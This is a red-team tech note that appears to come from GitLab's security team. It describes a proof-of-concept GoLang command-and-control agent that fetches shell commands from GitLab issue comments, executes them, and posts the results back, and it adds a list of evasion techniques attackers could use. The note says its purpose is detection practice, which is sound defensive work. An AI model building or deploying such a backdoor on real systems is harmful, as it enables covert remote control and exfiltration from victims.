# Red Teaming - Using GitLab as a Command and Control(C2) server

[[_TOC_]]

# Introduction

Cyber attack groups are known to use various platforms and applications as Command and Control (C2) servers/solutions in order to establish backdoor communication channels with their targets. Those communication channels can be used to exfiltrate data, upload malicious payloads and control compromised systems.

Attack groups [have used software repositories as C2](https://www.malwarebytes.com/blog/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign), and GitLab is no exception to this. Apart from software repositories, a multitude of [online services have been the source of C2 projects](https://github.com/mthcht/Purpleteam/blob/main/Detection/Threat%20Hunting/generic/C2_abusing_API_services.md). As a red team, we want to replicate such activities to practice and improve our detections.

In this "Tech Note", we'll have a look at:

- The GitLab features attackers could use as a C2.
- The development of a simple agent in GoLang that takes advantage of those features (GitLab issues and comments).
- Testing the solution/architecture and identify what to look for from a defense perspective.

# GitLab "C2 features"

In its simplest form, a C2 server can just be seen as a communication channel, allowing an attacker to control its agents by submitting commands and waiting for those agents to fetch, execute and report back on those commands. 

Attackers trying to blend in with legitimate traffic or avoid detections may choose to use different features of GitLab to do so. The main requirement is the ability to get and post information. The following features could be used for instance:

- The Git repository of a project
- The comment section of an issue within a project or an Epic
- The comment section of snippets or merge requests

Git repositories have been [used in previous attacks](https://www.computerweekly.com/news/252528192/Iranian-APT-seen-exploiting-GitHub-repository-as-C2-mechanism), the attacker committing in a file the commands and the agent pulling those commands from the repository, executing them and committing back/pushing the results of such commands.

Issues and comments can also be used in a similar way. The attacker can post commands in issue comments and agents can fetch those commands, execute them and post back results as replies. We will explore this feature, keeping it simple as a proof of concept.

# Coding a simple agent

As described above, the "server" features of our C2 solution is using the native functionalities of GitLab, we only need to code the agent. We'll do it in GoLang, following a simple approach:

- Creating a new issue named with the agent identifier if none exists (authentication done with a GitLab project access token)
- Running a main loop indefinitely until an "exit" command is received:
  - Regularly fetching new comments within the issue (every 5-10 seconds)
  - If a new comment is found, fetching it and trying to execute the command(s)
  - Once the command is executed, uploading the result(s) as a reply of the comment.

The above should be achieved through API calls to GitLab without the need to scrape any web pages (scraping is not reliable as web pages design changes regularly). The full code of the PoC is accessible [here](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-c2-agent)

The API calls we will use are the following:

- `https://gitlab.com/api/v4/projects/%d/issues`: list current issues and create one if none exist
- `https://gitlab.com/api/v4/projects/%d/issues/%d/discussions`: list the comments in the issue (as they will contain commands to execute)
- `https://gitlab.com/api/v4/projects/%d/issues/%d/discussions/%s/notes`: upload our results of command executions as "replies" of the comments

API responses are received as JSON arrays, we will create two structures to map those JSON arrays into variables we can use in our code: 

Issues:

```go
type Issue struct {
	IID   int    `json:"iid"`
	Title string `json:"title"`
}
```

Comments/replies:

```go
type Comment []struct {
	ID    string `json:"id"`
	Notes []struct {
		Body string `json:"body"`
	} `json:"notes"`
}
```

The functions that will perform the API calls are the following:

```go
func createIssue(accessToken string, projectID int, title string) (int, error)
func fetchComments(accessToken string, projectID, issueIID int) ([]byte, error)
func execCommand(command string) (string, error)
func uploadCommentToIssue(accessToken string, comment string, issueIID int, discussionID string) error
```

Those four functions will be responsible for:

- Creating an issue (if none exists already)
- Retrieving the comments within the issue
- Executing the commands received locally (a simple `exec.Command()` done from the `os/exec` GoLang package)
- Uploading the output of the command executed as a reply to the comment that contained the command

We will not go over all the details of those functions as the code is pretty self explanatory, you can check the code [here](https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/gitlab-c2-agent).

Our main loop will be an infinite `for` loop that regularly checks if a new comment has been posted and if yes, will try to execute the command posted and report back the result.

If the `exit` command is entered, it will terminate the loop and the program.

We will use a `context` object from the `context` package and a `select` statement, those are commonly used in networking development to loop over different states.

The skeleton of the `main()` function is the following (not all details/variables neither error handling are shown for clarity):

```go
func main() {
        //create context with a cancellation function cancel() so we can use it to exit the program
	ctx, cancel := context.WithCancel(context.Background())

	// get project access token or set it
        // accessToken := ...

	// check if agent issue is there in the project and if not create one, titled as the agent name
	issueIID, err := createIssue(accessToken, projectID, agentName)
	
        // main for loop, select around 2 cases, a time interval (5 sec) and the "exit" command
	for {
		select {
		case <-ctx.Done(): // exit agent when "exit" command is received
			fmt.Println("Exiting")
			return
		case <-time.After(interval): 
			// checking if there is a new comment in the issue
			body, err := fetchComments(accessToken, projectID, issueIID)
			json.Unmarshal(body, &comments)
			// going over the comment content:
			for _, comment := range comments {
					// check if comment is the "exit" command
					if comment.Notes[0].Body == "exit" {
						cancel()
					// if not, execute the command and upload results
					} else {
						out, err := execCommand(comment.Notes[0].Body)
						err = uploadCommentToIssue(accessToken, "```bash\n"+out, issueIID, comment.ID)			
					}			
			}
		}
	}
}
```

# Testing our C2

We now have the agent ready, we can run it on a sample victim machine and see if we can interact with it. For this, we need to have a project access token generated with API access and `Guest` role (the name of the token will appear as the agent "username" within the issue). We also need to have the ID of our project. Once those two variables are filled in within the code, we can compile our agent for its destination platform:

![image.png](./c2-agent.png)

We can now launch our agent and see if it creates its issue within the target project:

![image.png](./c2-issue.png)

Within the issue, we can enter commands as comments and wait for the agent to fetch them, execute and upload the result as replies to our comments:

![image.png](./c2-commands.png)

If we enter the "exit" command, we can see our agent terminating:

![image.png](./c2-exit.png)

# Real world use case

This agent is functioning but is clearly not in a state attackers would use and is not what is found in mature C2 frameworks. For instance, the execution of commands is done without any checks and only implemented as a system `exec()` call that is easily detectable.

Attackers would certainly implement other functionalities/aspects such as:

* Native OS API calls to execute various commands, including for instance upload/download functions
* Obfuscation if needed (for instance, commands hidden within blobs of text)
* Vary the call-back time intervals
* Use custom/pools of different http user-agents
* Separate the location of a command's input from its output (for instance, entering commands in an issue comment and agent uploading output in a snippet comment)
* Do not hardcode the access token in the code but fetch it from a one time URL
* Strip down the code to a minimal form, obfuscate the code, compile it without symbols/debugging information

# Defensive measures

GitLab itself is not being attacked when "used" this way which makes any automatic detection and defensive measures almost impossible to implement.

As shown in the paragraph above, attackers have a lot of room to creatively use the platform this way. Security teams may implement detections around API calls and types, combined with project usage behaviours but it is not possible to fully automate detections for such abuses.

# Conclusion

This proof of concept demonstrates that when attackers need to blend into known traffic or avoid detections, they have a large choice of solutions for custom C2 architectures, GitLab being one of them. Other DevOps platforms or any solutions that have communication features can be used this way.

Raising awareness within defense teams around this is important to help spot such abuses and proof of concepts/simulations are a great way to do so.